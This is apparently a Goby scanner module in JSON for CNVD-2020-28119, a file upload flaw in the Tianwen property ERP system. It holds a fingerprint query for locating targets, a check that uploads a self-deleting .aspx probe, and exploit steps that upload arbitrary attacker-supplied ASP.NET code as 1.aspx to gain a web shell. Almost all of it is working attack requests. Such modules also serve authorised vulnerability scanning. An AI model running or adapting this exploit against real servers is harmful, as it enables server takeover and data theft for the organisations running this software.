{ "Name": "Tianwen ERP system FileUpload CNVD-2020-28119", "Level": "2", "Tags": [ "getshell" ], "GobyQuery": "body=\"天问物业ERP系统\"", "Description": "Tianwen ERP system", "Product": "Tianwen ERP system", "Homepage": "http://www.tw369.com/", "Author": "", "Impact": "There is a file upload vulnerability in the ERP management platform /HM/M_Main/uploadfile.aspx of Chengdu Tianwen Internet Technology Co., Ltd., and attackers can use the vulnerability to upload malicious files to obtain server permissions.", "Recommendation": "", "References": [ "https://www.cnvd.org.cn/flaw/show/CNVD-2020-28119" ], "HasExp": true, "ExpParams": [ { "Name": "Code", "Type": "input", "Value": "" } ], "ExpTips": { "Type": "", "Content": "" }, "ScanSteps": [ "AND", { "Request": { "method": "POST", "uri": "/HM/M_Main/uploadfile.aspx", "follow_redirect": true, "header": { "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarytKnDdPq6SMXufwyT" }, "data_type": "text", "data": "------WebKitFormBoundarytKnDdPq6SMXufwyT\r\nContent-Disposition: form-data; name=\"__VIEWSTATE\"\r\n\r\n/wEPDwUKLTg1NDU3MTA4OQ9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRk70CKfgUcso35StfmoNB/ObwwU8W4qvmgqa52HxmqsU0=\r\n------WebKitFormBoundarytKnDdPq6SMXufwyT\r\nContent-Disposition: form-data; name=\"__VIEWSTATEGENERATOR\"\r\n\r\nDE1005D5\r\n------WebKitFormBoundarytKnDdPq6SMXufwyT\r\nContent-Disposition: form-data; name=\"__EVENTVALIDATION\"\r\n\r\n/wEdAAIk02sIXo/TRIPUygBB64GvmW/ynBkkkA2xI95ik8Vs4GXPPWvIYnA84468jdc5Wr+nrufsSY+RKtcm7vKIotDs\r\n------WebKitFormBoundarytKnDdPq6SMXufwyT\r\nContent-Disposition: form-data; name=\"BtnSave\"\r\n\r\n确定上传\r\n------WebKitFormBoundarytKnDdPq6SMXufwyT\r\nContent-Disposition: form-data; name=\"upload_img\"; filename=\"1.aspx\"\r\nContent-Type: application/octet-stream\r\n\r\n<%@Page Language=\"C#\"%>\r\n<%Response.Write(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String(\"{{{enbs4str1}}}\"))); System.IO.File.Delete(Request.PhysicalPath);%>\r\n\r\n------WebKitFormBoundarytKnDdPq6SMXufwyT\r\n", "set_variable": [ "str2|rand|str|4", "enbs4str1|define|base64|str2" ] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "UploadCallBack", "bz": "" } ] }, "SetVariable": [ "shell_url|lastbody|regex|\\('(.*)'\\)" ] }, { "Request": { "method": "GET", "uri": "{{{shell_url}}}", "follow_redirect": true, "header": null, "data_type": "text", "data": "", "set_variable": [] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "{{{str2}}}", "bz": "" } ] }, "SetVariable": [ "output|lastbody||" ] } ], "ExploitSteps": [ "AND", { "Request": { "method": "POST", "uri": "/HM/M_Main/uploadfile.aspx", "follow_redirect": true, "header": { "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarytKnDdPq6SMXufwyT" }, "data_type": "text", "data": "------WebKitFormBoundarytKnDdPq6SMXufwyT\r\nContent-Disposition: form-data; name=\"__VIEWSTATE\"\r\n\r\n/wEPDwUKLTg1NDU3MTA4OQ9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRk70CKfgUcso35StfmoNB/ObwwU8W4qvmgqa52HxmqsU0=\r\n------WebKitFormBoundarytKnDdPq6SMXufwyT\r\nContent-Disposition: form-data; name=\"__VIEWSTATEGENERATOR\"\r\n\r\nDE1005D5\r\n------WebKitFormBoundarytKnDdPq6SMXufwyT\r\nContent-Disposition: form-data; name=\"__EVENTVALIDATION\"\r\n\r\n/wEdAAIk02sIXo/TRIPUygBB64GvmW/ynBkkkA2xI95ik8Vs4GXPPWvIYnA84468jdc5Wr+nrufsSY+RKtcm7vKIotDs\r\n------WebKitFormBoundarytKnDdPq6SMXufwyT\r\nContent-Disposition: form-data; name=\"BtnSave\"\r\n\r\n确定上传\r\n------WebKitFormBoundarytKnDdPq6SMXufwyT\r\nContent-Disposition: form-data; name=\"upload_img\"; filename=\"1.aspx\"\r\nContent-Type: application/octet-stream\r\n\r\n{{{Code}}}\r\n\r\n------WebKitFormBoundarytKnDdPq6SMXufwyT\r\n", "set_variable": [] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" } ] }, "SetVariable": [ "output|lastbody|regex|\\('(.*)'\\)" ] } ], "PostTime": "0000-00-00 00:00:00", "GobyVersion": "0.0.0" }